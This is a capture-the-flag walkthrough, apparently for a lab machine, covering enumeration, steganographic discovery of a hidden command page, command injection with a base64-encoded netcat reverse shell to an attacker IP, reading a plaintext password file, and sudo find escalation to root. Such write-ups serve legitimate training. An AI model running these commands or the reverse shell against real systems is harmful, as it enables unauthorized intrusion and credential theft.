RATING
Intermediate
ENUMERATION
We kick things off with our usual nmap scan:
Command: nmap -sV -sC -T4 -Pn -p- 192.168.201.15
Navigating to the target in our browser, we are met with what appears to be a fake admin are with no functionality:
We proceed to directory bruteforce with feroxbuster and discover http://192.168.201.15/admin:
Command: feroxbuster -u http://192.168.201.15/ -w /usr/share/wordlists/dirb/common.txt -k --quiet
Navigating to http://192.168.201.15/admin, we see a page with several images:
Viewing the page source, we discover a passphrase:
We download the images and using steghide and our newly discovered passphrase, we are able to extract and decode imp.txt from haclabs.jpeg to reveal a new web page, superadmin.php:
Command: steghide extract -sf haclabs.jpeg
Command: cat imp.txt
Command: echo "c3VwZXJhZG1pbi5waHA=" | base64 -d
Navigating to http://192.168.201.1/superadmin.php in our browser, we see that we are able to enter commands to be executed:
EXPLOITATION
We create a reverse shell and base64 encode it to bypass any filters:
Command: echo "nc.traditional -e /bin/bash 192.168.45.153 443" | base64
We craft our command as follows and execute it, catching our shell via netcat and upgrading it:
Command: nc -nvlp 443
Command: 127.0.0.1 | echo "bmMudHJhZGl0aW9uYWwgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNDUuMTUzIDQ0Mwo=" | base64 -d
Command: python3 -c 'import pty; pty.spawn("/bin/bash")'
PRIVILEGE ESCALATION
Navigating through our target, we discover that user yash has a flag1.txt that indicates that there is a hidden file with a password for user haclabs:
Command: ls -l
Command: cat flag1.txt
We run the find command to search through all files owned by user yash. We are able to find the password haclabs1234 in /usr/share/hidden/.passwd:
Command: find / -type f -user yash 2>/dev/null
Command: cat /usr/share/hidden/.passwd
After switching to user haclabs with our newly discovered password, we check for sudo privileges and see that haclabs can run the find command. We simply head over to GTFOBins and use the find binary to escalate to root and read our proof.txt:
Command: sudo find . -exec /bin/sh \; -quit
